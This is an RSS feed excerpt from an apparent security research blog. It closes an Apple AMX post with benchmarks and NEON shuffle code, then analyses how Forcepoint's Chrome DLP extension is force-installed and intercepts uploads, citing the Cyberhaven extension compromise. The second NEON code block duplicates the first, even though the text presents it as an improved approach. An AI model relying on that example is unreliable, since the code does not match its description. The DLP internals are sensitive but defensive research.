<td>1024</td><td>2483.596</td><td>0.00088</td><td>0.00086</td><td>0.00093</td></tr>
<tr>
<td>2048</td><td>1787.963</td><td>0.01019</td><td>0.00961</td><td>0.01196</td></tr>
<tr>
<td>4096</td><td>1727.521</td><td>0.08243</td><td>0.07956</td><td>0.11510</td></tr>
<tr>
<td>8192</td><td>1628.371</td><td>0.70349</td><td>0.67522</td><td>0.77956</td></tr>
</tbody>
</table>
</div><p>The Accelerate framework vastly outperforms OpenBLAS for smaller matrix sizes. For instance, at N=64, Accelerate achieves 699 GFLOP/s, whereas OpenBLAS only achieves 79.6 GFLOP/s. The difference is consistent up to N=512, where Accelerate records 2274 GFLOP/s compared to 371 GFLOP/s from OpenBLAS. The response times (mean, min, max) for Accelerate are near-zero for smaller matrix sizes, showing that AMX instructions are highly efficient in handling small matrix operations. In contrast, OpenBLAS has slightly larger response times, especially for N=128 and beyond.</p>
<p>At larger matrix sizes, the performance gap narrows somewhat, but Accelerate continues to outperform OpenBLAS. For instance, at N=1024, Accelerate reaches 2483 GFLOP/s, whereas OpenBLAS caps at 423 GFLOP/s. Response times for Accelerate remain competitive but grow slightly as the matrix sizes increase. OpenBLAS exhibits much longer response times, especially at large matrix sizes (e.g., N=4096 and N=8192), where its mean response times are several times longer than Accelerate’s.</p>
<p>At the largest matrix size tested, N=8192, the performance difference shrinks further. Accelerate achieves 1628 GFLOP/s, while OpenBLAS achieves 574 GFLOP/s. This suggests that the performance efficiency of both libraries stabilizes at larger matrix sizes, though Accelerate is still around 3x faster. OpenBLAS shows significant increases in response times at these large matrix sizes, particularly with mean response times exceeding 2.2 seconds, while Accelerate's mean response time is around 0.7 seconds.</p>
<h1 id="heading-why-did-apple-built-amx">Why did Apple Built AMX?</h1>
<p>The fact of the matter is that Apple waited on SVE to be matured to fully make the jump to adopting it, and AMX was simply a stopgap solution to address the shortcomings of Arm NEON.</p>
<p>Many have critiqued NEON for various quirks, but one of the more obscure but important critiques of NEON was with NEON’s lack of generic shuffle instructions like those found in x86 SSE. In AVX, shuffle operations are typically low-latency, single-cycle instructions. For instance, the <code>VSHUFPS</code> instruction, which <code>_mm256_shuffle_ps</code> maps to, has a latency of 1 cycle and a throughput of 1 cycle on many Intel architectures.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;immintrin.h&gt;</span></span>

<span class="hljs-function">__m128 <span class="hljs-title">shuffle_sse</span><span class="hljs-params">(__m128 a, __m128 b)</span> </span>{
    <span class="hljs-keyword">return</span> _mm_shuffle_ps(a, b, _MM_SHUFFLE(<span class="hljs-number">3</span>, <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>));
}
</code></pre>
<p>But many who had experience with porting AVX code to NEON (especially with shuffle instructions) found that it often involves reimagining the data flow of the algorithm. Instead of relying on flexible, single-instruction shuffles, NEON code might use a combination of vector extracts, reverses, and interleaving operations to achieve the desired data arrangement.</p>
<p>The most straightforward way to do this in NEON might involve using a combination of <code>vgetq_lane_f32</code> to extract individual lanes, <code>vsetq_lane_f32</code> to set lanes, and <code>vcopyq_lane_f32</code> to move data between vectors. For broadcasting a single lane to all elements, <code>vdupq_lane_f32</code> can be used. However, this lane-by-lane approach can lead to suboptimal performance on ARM hardware.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;arm_neon.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">float32x4_t</span> <span class="hljs-title">shuffle_neon</span><span class="hljs-params">(<span class="hljs-keyword">float32x4_t</span> a, <span class="hljs-keyword">float32x4_t</span> b)</span> </span>{
    <span class="hljs-keyword">float32x2_t</span> low_a = vget_low_f32(a);
    <span class="hljs-keyword">float32x2_t</span> high_a = vget_high_f32(a);
    <span class="hljs-keyword">float32x2_t</span> high_b = vget_high_f32(b);

    <span class="hljs-keyword">float32x2_t</span> shuffled_a = vext_f32(low_a, high_a, <span class="hljs-number">1</span>);
    <span class="hljs-keyword">float32x4_t</span> result = vcombine_f32(shuffled_a, high_b);

    result = vsetq_lane_f32(vgetq_lane_f32(b, <span class="hljs-number">1</span>), result, <span class="hljs-number">2</span>);

    <span class="hljs-keyword">return</span> result;
}
</code></pre>
<p>To achieve better performance with NEON, programmers can leverage some instructions that can operate on multiple lanes simultaneously. One such instruction is <code>vextq_f32</code>, which allows extraction of components from two vectors, combining them based on a specified starting index. NEON also provides a family of reverse instructions, including <code>REV16</code>, <code>REV32</code>, and <code>REV64</code>, which can efficiently reverse the order of elements within specific portions of a vector. While each of these instructions typically has a 2 cycle latency, they can potentially replace multiple lane-specific operations, leading to overall better performance.</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;arm_neon.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">float32x4_t</span> <span class="hljs-title">shuffle_neon</span><span class="hljs-params">(<span class="hljs-keyword">float32x4_t</span> a, <span class="hljs-keyword">float32x4_t</span> b)</span> </span>{
    <span class="hljs-keyword">float32x2_t</span> low_a = vget_low_f32(a);
    <span class="hljs-keyword">float32x2_t</span> high_a = vget_high_f32(a);
    <span class="hljs-keyword">float32x2_t</span> high_b = vget_high_f32(b);

    <span class="hljs-keyword">float32x2_t</span> shuffled_a = vext_f32(low_a, high_a, <span class="hljs-number">1</span>);
    <span class="hljs-keyword">float32x4_t</span> result = vcombine_f32(shuffled_a, high_b);

    result = vsetq_lane_f32(vgetq_lane_f32(b, <span class="hljs-number">1</span>), result, <span class="hljs-number">2</span>);

    <span class="hljs-keyword">return</span> result;
}
</code></pre>
<p>With Apple's AMX, there exist an instruction called <a target="_blank" href="https://github.com/corsix/amx/blob/main/genlut.md">genlut</a>, which has two primary modes: lookup and generate. In lookup mode, it can perform operations similar to a combination of AVX512's <code>vpshufb</code> and <code>vgatherps</code> instructions. This allows for complex data rearrangement and gathering operations within a single instruction. The lookup mode supports various data types and lane counts, ranging from 8-bit to 64-bit elements, with lane counts varying from 8 to 64 depending on the data size.</p>
<p>The generate mode of Apple AMX's genlut instruction functions as an inverse operation to <code>vpshufb</code>, primarily used for quantization. In this mode, genlut reads a full 512-bit (64-byte) vector of data from the source and produces a packed vector of indices. The process involves searching the table register for each lane in the source vector. It finds the minimum value 'v' such that <code>table[v] &gt; source_lane</code>, and then writes the index value 'v - 1', or '-1' if no such 'v' is found.</p>
<p>This operation supports arbitrary 2, 3, 4, or 5-bit quantization, depending on the mode selected. Modes 0, 2, 3, and 5 perform 4-bit quantization, allowing for 16 levels, while modes 1, 4, and 6 use 5-bit quantization, providing 32 levels. The resulting quantized indices are densely packed into the low bytes of an X or Y register, with the remaining bytes cleared to zero. This packed result can be used directly in subsequent lookup operations, enabling efficient piecewise linear approximations of complex functions.</p>
<h1 id="heading-the-future-of-amx">The Future of AMX</h1>
<p>Before Armv9 was even on the horizon, the usage of AMX itself was controversial. ARM typically does not allow custom ISA extensions and the main legal concern is that while developers can use AMX, ARM might take issue if non-Apple entities start using it in production, potentially leading to ARM restricting future chip functionality.</p>
<p>AMX also introduces a new EL0 state, requiring changes to the ARM64 kernel’s context-switching mechanisms to handle additional register states. However, integrating these changes directly into the core ARM64 architecture code is complex and may not be welcomed upstream due to the proprietary nature of AMX and potential objections from ARM.</p>
<p>With the introduction of the Apple M4 chip, Apple finally adopted the Armv9 ISA which also brings the support of <a target="_blank" href="https://mastodon.social/@bshanks/112401605018159567">SVE to Apple platforms</a>.</p>
]]></content:encoded></item><item><title><![CDATA[Behind Chrome-Based DLP Plugins]]></title><description><![CDATA[Cover Illustration by buruberrii_

While we discussed previously about how endpoint-based DLP/EDR agents work in macOS, there is another component of endpoint security systems that are often overlooked and that is the browser extension component. End...]]></description><link>https://research.meekolab.com/dissecting-chrome-based-dlp-plugins</link><guid isPermaLink="true">https://research.meekolab.com/dissecting-chrome-based-dlp-plugins</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Fri, 27 Dec 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1735658500209/312b88ff-b183-4d5c-9b8c-ef3139f7d426.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by</em></strong> buruberrii_</p>
</blockquote>
<p>While we discussed previously about how <a target="_blank" href="https://research.meekolab.com/internals-of-macos-endpoint-security-products">endpoint-based DLP/EDR agents work in macOS</a>, there is another component of endpoint security systems that are often overlooked and that is the browser extension component. Endpoint Security systems, especially DLPs, use the browser extension component to intercept web traffic and inspect uploaded/downloaded files.</p>
<p>This came into focus unexpectedly with the news that Cyberhaven DLP’s Chrome Extension was compromised by a threat actor over the holidays.</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://twitter.com/cstanley/status/1872365853318225931">https://twitter.com/cstanley/status/1872365853318225931</a></div>
<p> </p>
<blockquote>
<p><strong>What happened?</strong></p>
<p>On December 24th, 2024, at approximately 5:24 PM UTC, a targeted advanced attack successfully occurred on a Cyberhaven employee. The attacker used the access gained in this attack to publish a malicious Chrome extension (version 24.10.4) to the Chrome Web Store in the early morning of December 25th, 2024.</p>
<p>Cyberhaven's internal security team detected the attack at 11:54 PM UTC on December 25th, 2024. Cyberhaven removed the malicious package within 60 minutes of detection.</p>
<p><strong>What was the impact?</strong></p>
<p>For browsers running the compromised plugin, it is possible for sensitive information, including authenticated sessions and cookies, to be exfiltrated to the attacker's domain (cyberhavenext[.]pro) The exfill domain was online from 1:32AM UTC December 25th, 2024 until 2:50AM UTC on December 26th, 2024 What we recommend on impacted endpoints</p>
<p>Verify that the impacted Cyberhaven Chrome extension version 24.10.4 is updated to 24.10.5 or newer Revoke/rotate all passwords that aren't FIDOv2 Revoke/rotate all API tokens Review all logs to verify no malicious activity Versions not hosted on the Chrome store (Firefox, edge) were not affected Next steps</p>
<p>Cyberhaven will continue its investigation into this incident and update its customers accordingly We are working on providing additional telemetry and additional threat intelligence and will share it with impacted customers as soon as possible Cyberhaven has engaged Mandiant and Federal Law Enforcement to help in this investigation One of Cyberhaven's core values is maximum transparency, and we are acting on these first principles to retain the trust we have earned from you. We will continue to keep you updated and support you in every way possible to mitigate the impact of this incident.</p>
<p><strong>Additional information about the incident:</strong></p>
<p>This incident only impacted machines running Chrome-based browsers that were updated via the Google Chrome Web Store.</p>
<p>After an in-depth review, the only compromise at Cyberhaven was a single admin account for the Google Chrome Store that allowed the attacker to push a malicious Chrome extension and bypass Cyberhaven controls; there was no other attack vector or any additional compromised accounts, including our CI/CD processes or code signing keys. The only impacted version of the plugin is 24.10.4. It only affected machines that were online between 1:32 AM UTC on December 25th, 2024 and 2:50 AM UTC on December 26th, 2024.</p>
<p>We know the attack did not clean up the Chrome data store, so we have included instructions below that your security teams can use to verify what if any, data was exfiltrated. Cyberhaven will be publishing a new Chrome extension (version 24.10.6) that will leverage this new information to gather additional telemetry to narrow down the scope of possible compromised machines; also, this data will allow us to narrow down the scope of possible compromised browsers and understand what if any, data was exfiltrated</p>
</blockquote>
<h1 id="heading-whats-a-dlp">Whats a DLP?</h1>
<p>Data Loss Prevention (DLP) solutions are security tools that inspect data in-motion (network traffic), at-rest (stored data), and in-use (endpoint actions) to identify and control sensitive data movement based on predefined or custom policies. They operate at network, storage, and OS levels with capabilities for monitoring, blocking, decrypting, or quarantining data that matches sensitive patterns like PII, financial data, or intellectual property.</p>
<p>But why do DLPs need their own Chrome plugin? At a technical level DLPs are similar to EDRs, the main difference is just the ruleset they abide by, so why can’t they just use the agent they already have installed that have root privileges and network monitoring capabilities anyways?</p>
<p>Modern web browsers like Chrome implement a sophisticated security model where each tab and process runs in an isolated sandbox environment. This architectural design prevents traditional OS-level monitoring tools from directly observing or controlling network operations within the browser. The browser's own network stack handles complex protocols, TLS/SSL sessions, connection pooling, and resource prioritization independently of the operating system's network stack.</p>
<p>DLP providers require Chrome extensions because they need privileged access to browser-specific APIs that can intercept and analyze data transfers before they enter the encrypted TLS tunnel. These extensions can tap into <code>chrome.webRequest</code>, <code>chrome.downloads</code>, <code>chrome.tabs</code>, and <code>chrome.storage</code> APIs, providing critical capabilities like pre-TLS content inspection, DOM access for monitoring form uploads, and context awareness to track the exact origin of data transfers. The extension model also gives DLP solutions direct access to browser events and the JavaScript runtime, enabling them to detect and analyze dynamic content uploads through modern web APIs.</p>
<p>While the threat of <a target="_blank" href="https://www.youtube.com/watch?v=KiE6VNjW8ic">malicious Chrome extensions</a> have been well known for quite sometime, and sysadmins have mostly migrated to more secure Chrome deployments by limiting extension installation, i always have seen Plugin-based DLP solutions like Cyberhaven, and on this instance Forcepoint, as a weak spot. These are highly privileged addons that are intended to be installed by sysadmins in a wide IT deployment and they’re rarely audited beforehand because of course its a security product, its supposed to be intrusive.</p>
<p>As chrome extensions also operate cross-platform, the material presented here is relevant to both macOS and Windows installations. This post will also focus on a specific chromium extension-based implementation from Forcepoint Endpoint, but i expect other solutions implement similar mechanisms in terms of delivery and interception methods.</p>
<h1 id="heading-delivery-method">Delivery Method</h1>
<p>In researching for this issue, i've found this <a target="_blank" href="https://liudanking.com/beautiful-life/remove-chrome-plugin-force-installed-by-enterprise-policy/">chinese article</a> about how Forcepoint embeds their add-on into Chrome and Firefox which i found unique. It seems like despite being an old dissection of the delivery logic, the implementation remains the same till now.</p>
<p>There is a bash script located in the main installation path for Forcepoint in <code>/Library/Application Support/Websense Endpoint/DLP</code>. This script manages the checking of Chrome's existence and the forceful installation of the add-on.</p>
<pre><code class="lang-bash"><span class="hljs-meta">#!/bin/bash</span>

CUT=<span class="hljs-string">"/usr/bin/cut"</span>
LSOF=<span class="hljs-string">"/usr/sbin/lsof"</span>
PS=<span class="hljs-string">"/bin/ps"</span>
PROFILES=<span class="hljs-string">"/usr/bin/profiles"</span>
GREP=<span class="hljs-string">"/usr/bin/grep"</span>

PIDS=`<span class="hljs-variable">$PS</span> -axc -o pid,<span class="hljs-built_in">command</span> | <span class="hljs-variable">$GREP</span> <span class="hljs-string">"Google Chrome"</span> | <span class="hljs-variable">$GREP</span> -v <span class="hljs-string">"Google Chrome Helper"</span> | <span class="hljs-variable">$CUT</span> -c 1-5`

LIBWEP_HOOKED=0
<span class="hljs-keyword">if</span> [ <span class="hljs-variable">${#PIDS[@]}</span> -gt 0 ]
<span class="hljs-keyword">then</span>
    <span class="hljs-keyword">for</span> pid <span class="hljs-keyword">in</span> <span class="hljs-variable">$PIDS</span>
    <span class="hljs-keyword">do</span>
        CNT=`<span class="hljs-string">"<span class="hljs-variable">$LSOF</span>"</span> -P -T -p <span class="hljs-variable">$pid</span> | grep libwep_chrome.dylib | wc -l`
        <span class="hljs-keyword">if</span> [ <span class="hljs-variable">$CNT</span> == 1 ]
        <span class="hljs-keyword">then</span>
            LIBWEP_HOOKED=1
        <span class="hljs-keyword">fi</span>
    <span class="hljs-keyword">done</span>
<span class="hljs-keyword">fi</span>

<span class="hljs-keyword">if</span> [ <span class="hljs-variable">$LIBWEP_HOOKED</span> == 1 ]
<span class="hljs-keyword">then</span>
    <span class="hljs-built_in">echo</span> <span class="hljs-string">"Configuring the chrome extension profile..."</span>
    <span class="hljs-variable">$PROFILES</span> -I -F <span class="hljs-string">"/Library/Application Support/Websense Endpoint/DLP/WebsenseEndpointExtension.config"</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>This script (<code>setup_chrome_ext.sh</code>) is designed to check if the Google Chrome browser is running on the system and if a specific library, <code>libwep_chrome.dylib</code>, is loaded by any of the Chrome processes. Then, it uses these utilities to get a list of process IDs (PIDs) for Chrome processes, excluding the "Google Chrome Helper" process.</p>
<p>For each Chrome PID, it checks if the <code>libwep_chrome.dylib</code> library is loaded using the <code>lsof</code> command. If the library is loaded for at least one Chrome process, the script assumes that a specific Chrome extension is installed and proceeds to execute the <code>profiles</code> command with the <code>-I -F</code> options and a configuration file path (<code>/Library/Application Support/Websense Endpoint/DLP/WebsenseEndpointExtension.config</code>).</p>
<pre><code class="lang-xml"><span class="hljs-meta">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-meta-keyword">plist</span> <span class="hljs-meta-keyword">PUBLIC</span> <span class="hljs-meta-string">"-//Apple//DTD PLIST 1.0//EN"</span> <span class="hljs-meta-string">"http://www.apple.com/DTDs/PropertyList-1.0.dtd"</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">plist</span> <span class="hljs-attr">version</span>=<span class="hljs-string">"1.0"</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadIdentifier<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>com.websense.WebsenseEndpointExtension<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadRemovalDisallowed<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">false</span> /&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadScope<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>System<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadType<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>Configuration<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadUUID<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>5A93F4FD-5894-4396-856C-0AD9A0537752<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadOrganization<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>Websense<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadVersion<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">integer</span>&gt;</span>1<span class="hljs-tag">&lt;/<span class="hljs-name">integer</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadDisplayName<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>WebsenseEndpoint<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadContent<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadType<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>com.apple.ManagedClient.preferences<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadVersion<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">integer</span>&gt;</span>1<span class="hljs-tag">&lt;/<span class="hljs-name">integer</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadIdentifier<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>com.websense.WebsenseEndpointExtension.E503A43D-BE99-4D26-B9F4-8434364012F7<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadUUID<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>E503A43D-BE99-4D26-B9F4-8434364012F7<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadEnabled<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">true</span> /&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadDisplayName<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>Google Chrome<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>PayloadContent<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>com.google.Chrome<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>Forced<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>mcx_preference_settings<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">key</span>&gt;</span>ExtensionInstallForcelist<span class="hljs-tag">&lt;/<span class="hljs-name">key</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">string</span>&gt;</span>ljckpacopljdanbdkdddedlackndojmf<span class="hljs-tag">&lt;/<span class="hljs-name">string</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">array</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">dict</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">plist</span>&gt;</span>
</code></pre>
<p><code>WebsenseEndpointExtension.config</code> itself is then used to force the installation of the Chrome extension by leveraging the "Managed Client" feature in macOS. Specifically, it uses the <code>com.apple.ManagedClient.preferences</code> payload type to manage the preferences for the Google Chrome application. Within the Chrome preferences, it defines an "<code>ExtensionInstallForcelist</code>" array under the "<code>mcx_preference_settings</code>" key, which contains the extension ID "<code>ljckpacopljdanbdkdddedlackndojmf</code>".</p>
<p>When this configuration profile is deployed and applied to a macOS system, the Managed Client service interprets the forced preferences and instructs Google Chrome to install the specified extension ID from the Chrome Web Store, essentially bypassing the normal user-initiated installation process.</p>
<h1 id="heading-the-extension-itself">The Extension Itself</h1>
<p>The <code>ljckpacopljdanbdkdddedlackndojmf</code> extension is called “Forcepoint Endpoint”. Its around 36 KB and doesn't have alot of content. The main logic of the extension is contained in the <code>background.js</code> file.</p>
<p>At the foundation of the interception system lies the primary request listener that captures all outgoing requests. The extension registers this listener using Chrome's webRequest API:</p>
<pre><code class="lang-javascript">chrome.webRequest.onBeforeRequest.addListener(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">return</span> <span class="hljs-string">"POST"</span> != e.method &amp;&amp; <span class="hljs-string">"PUT"</span> != e.method || (o[e.requestId] = e.requestBody), {
        <span class="hljs-attr">cancel</span>: <span class="hljs-literal">false</span>
    }
}, {
    <span class="hljs-attr">urls</span>: [<span class="hljs-string">"&lt;all_urls&gt;"</span>]
}, [<span class="hljs-string">"blocking"</span>, <span class="hljs-string">"requestBody"</span>]);
</code></pre>
<p>This listener focuses specifically on POST and PUT requests, which are typically used for file uploads and data submissions. When such a request is detected, the extension stores the request body in a temporary cache (object 'o'). The use of "&lt;all_urls&gt;" as the pattern means the extension monitors all web traffic, not just specific domains or protocols.</p>
<p>The main interception logic occurs in the <code>onBeforeSendHeaders</code> listener. This component performs deep inspection of requests and determines whether they should be allowed or blocked:</p>
<pre><code class="lang-javascript">chrome.webRequest.onBeforeSendHeaders.addListener(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">r</span>) </span>{
    <span class="hljs-keyword">if</span> (<span class="hljs-number">0</span> == O || <span class="hljs-string">"POST"</span> != r.method &amp;&amp; <span class="hljs-string">"PUT"</span> != r.method) <span class="hljs-keyword">return</span> {
        <span class="hljs-attr">cancel</span>: <span class="hljs-literal">false</span>
    };

    <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != r.url.match(<span class="hljs-regexp">/https?\:\/\/localhost\:55296\/ChromeExt\//i</span>) || 
        <span class="hljs-literal">null</span> != r.url.match(<span class="hljs-regexp">/mail\.google\.com\/cloudsearch/i</span>)) {
        <span class="hljs-keyword">return</span> { <span class="hljs-attr">cancel</span>: <span class="hljs-literal">false</span> }
    }
</code></pre>
<p>The extension implements sophisticated request filtering that takes into account various factors. It maintains a cache cleanup mechanism to prevent memory leaks. This cleanup function removes cached requests that are older than 30 seconds, ensuring efficient memory usage during long browsing sessions.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">T</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">var</span> e, t = (<span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span>).getTime();
    <span class="hljs-keyword">for</span> (e <span class="hljs-keyword">in</span> D) <span class="hljs-number">3e4</span> &lt; t - D[e] &amp;&amp; <span class="hljs-keyword">delete</span> D[e]
}
</code></pre>
<p>The extension performs detailed content analysis, particularly focusing on file uploads and attachments. It includes special handling for various file upload mechanisms. These functions handle different types of file uploads, with special consideration for Google's upload protocol and multipart form data. The boundary detection function is particularly important for parsing multipart form data correctly.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">B</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> t <span class="hljs-keyword">of</span> e)
        <span class="hljs-keyword">if</span> (<span class="hljs-string">"x-goog-upload-protocol"</span> == t.name.toLowerCase()) 
            <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">x</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">var</span> t = <span class="hljs-string">"boundary="</span>,
        r = <span class="hljs-string">""</span>,
        n = e.search(t);
    <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span> != n &amp;&amp; (n += t.length, <span class="hljs-string">'"'</span> == (r = <span class="hljs-number">-1</span> == (t = e.search(<span class="hljs-string">"\r\n"</span>)) ? 
           e.substr(n) : e.substr(n, t)).charAt(<span class="hljs-number">0</span>) &amp;&amp; 
           (r = r.slice(<span class="hljs-number">1</span>, r.length - <span class="hljs-number">1</span>))), r
}
</code></pre>
<p>The plugin communicates with a local server running on port 55296. This server is a part of the broader Forcepoint Websense DLP system.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">I</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">return</span> l ? <span class="hljs-string">"https://localhost:55296/ChromeExt/"</span> : <span class="hljs-string">"http://localhost:55296/ChromeExt/"</span>
}
</code></pre>
<p>When the extension intercepts a request, it forwards relevant information to this local server. The extension includes detailed metadata about each request in custom headers, allowing the local server to make informed decisions about whether to allow or block the request.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> y = <span class="hljs-keyword">new</span> XMLHttpRequest;
y.open(<span class="hljs-string">"POST"</span>, I() + X, b);
y.setRequestHeader(<span class="hljs-string">"X-Email-Url"</span>, r.url);
y.setRequestHeader(<span class="hljs-string">"X-Status"</span>, r.statusCode);
y.setRequestHeader(<span class="hljs-string">"X-Referrer"</span>, r.originUrl);
y.setRequestHeader(<span class="hljs-string">"X-Initiator"</span>, r.initiator);
